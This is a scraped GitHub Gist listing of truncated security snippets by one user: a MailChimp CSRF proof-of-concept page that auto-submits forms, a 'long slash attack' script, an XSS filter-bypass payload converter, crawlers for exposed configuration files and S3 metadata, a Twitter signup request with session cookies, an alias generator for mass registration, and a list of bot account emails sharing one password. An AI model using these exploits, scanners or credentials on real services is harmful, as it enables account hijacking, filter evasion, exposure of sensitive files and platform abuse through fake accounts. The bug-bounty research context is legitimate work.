Skip to content

Instantly share code, notes, and snippets.

@YasserGersy
YasserGersy / longslashattack.py
Last active September 23, 2016 01:45
longslashattack.py
import httplib, urllib
print "|------------------------------------------------------------|"
print "|------------------------------------------------------------|"
print "|------------------------Classic-----------------------------|"
print "|------------ Long slash Attack ---------------|"
print "|------------ By ---------------|"
<!DOCTYPE html><html><head>
<title> MailChimp CSRF Proof Of Concept</title>
<script type="text/javascript">
var t='0';
function exec(){if (t!='1') exec1(); }
function exec1() { document.getElementById('form1').submit();
setTimeout(exec2, 3000);}
function exec2(){
document.getElementById('form2').submit();
document.getElementById('r3').innerText='you just got hacked , i have changed your info';t='1';
@YasserGersy
YasserGersy / H1_Bots.txt
Last active January 17, 2021 12:34
Git 1.150 K Bots
mrexceptionbot0@yopmail.com :123!@#qweQWE
MrexceptionBot1@yopmail.com :123!@#qweQWE
MrexceptionBot2@yopmail.com :123!@#qweQWE
MrexceptionBot3@yopmail.com :123!@#qweQWE
MrexceptionBot4@yopmail.com :123!@#qweQWE
MrexceptionBot5@yopmail.com :123!@#qweQWE
MrexceptionBot6@yopmail.com :123!@#qweQWE
MrexceptionBot7@yopmail.com :123!@#qweQWE
MrexceptionBot8@yopmail.com :123!@#qweQWE
MrexceptionBot9@yopmail.com :123!@#qweQWE
@YasserGersy
YasserGersy / Email_Alias_Generator.py
Last active October 22, 2016 16:32
generate valid email aliases for multi registeration with single email
#bin/python
#Written by @yassergersy
#generate valid email aliases for multi registeration with single email
#Original at https://gist.github.com/YasserGersy/29f195c0e1506b867f3e1914b1098d91
import os,sys
def PlusFactorial(num):
# 4 + 3 + 2 + 1
res=0
while num !=0:
@YasserGersy
YasserGersy / TwitterRegister.http
Created October 21, 2016 00:01
Twitter Register request.http
POST /account/create HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://twitter.com/signup
Upgrade-Insecure-Requests: 1
Cookie: _twitter_sess=BAh7DCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCLPLFJBXAToMY3NyZl9p%250AZCIlM2YzZjUxZTc4Mzk4YjI3NmIzZTQ4ODY5ZDFiYmQwYzM6B2lkIiVkNDAx%250AZTIwZTk1M2JhMWIwODdkYTE2YTJjNTZlMTAwYjoSZ2V0X3RpbWVzdGFtcGwr%250ACLgW15BXAToQZ3Vlc3RfdG9rZW4iGDkyMjAyNDQyMDU4NjE4OTk5MDQ6Gmd1%250AZXN0X3Rva2VuX3RpbWVzdGFtcGwrCNMW15BXAQ%253D%253D--995b59bb710943f62537e0b4d299c39394a75fec; guest_id=v1%3A147559106449708223; _ga=GA1.2.1855789897.1475591126; pid="v3:1475591149327873419505391"; __utma=43838368.1855789897.1475591126.1475591334.1475591334.1; __utmc=43838368; __utmz=43838368.1475591334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _gat=1
Connec
@YasserGersy
YasserGersy / Configuration_crawler.py
Last active November 19, 2018 14:57
Configuration crawler to scan available sensitive configuration finles
import requests,time,sys,os
requests.adapters.DEFAULT_RETRIES = 2
requests.packages.urllib3.disable_warnings()
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
s = requests.Session()
retries = Retry(total=5,
@YasserGersy
YasserGersy / Server_redirect.py
Created July 25, 2017 21:29
Server_redirect.py
import requests,time,sys,os
requests.adapters.DEFAULT_RETRIES = 2
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
s = requests.Session()
@YasserGersy
YasserGersy / x-amz-meta-s3cmd-attrs.py
Created September 16, 2017 23:34
Scan domains against x-amz-meta-s3cmd-attrs information disclosure
import requests,sys
requests.packages.urllib3.disable_warnings()
if len(sys.argv)<2:
path='final.txt'
else:
path=sys.argv[1]
vulnerable=[]
@YasserGersy
YasserGersy / Js2S.py
Last active April 16, 2024 02:50
javascript mutil lines payload into one line
#The main purpose is to bypass xss filters and execute multi lines payload
#write your payload to a file.txt
#run the script and pass the file as argument
# $python js2S.py file.txt
# copy the output and pass the output paylad to a javascript function document.write or eval ,, etc ,
#for example , http://vuln2-xss.com/?name=document.write(__output__)
#if any character from the following is filtered , remove it.
import sys,os
@YasserGersy
YasserGersy / secretbox-sol.py
Last active March 3, 2018 20:19
Cyber-talent secretbox solution secret-box
#CTF https://cybertalents.com/competitions/quals-uae-egy-national-cyber-security-ctf-2018/secret-box
#https://s3-eu-west-1.amazonaws.com/hubchallenges/Reverse/secretbox.zip
#
#
#The code takes the message
#reveres it
# msg bitwised with the length of image file name
#Each char at i postioton in the MSG is stored in the image at postition [0,i][3]
#
#python secretbox-sol.py secret.png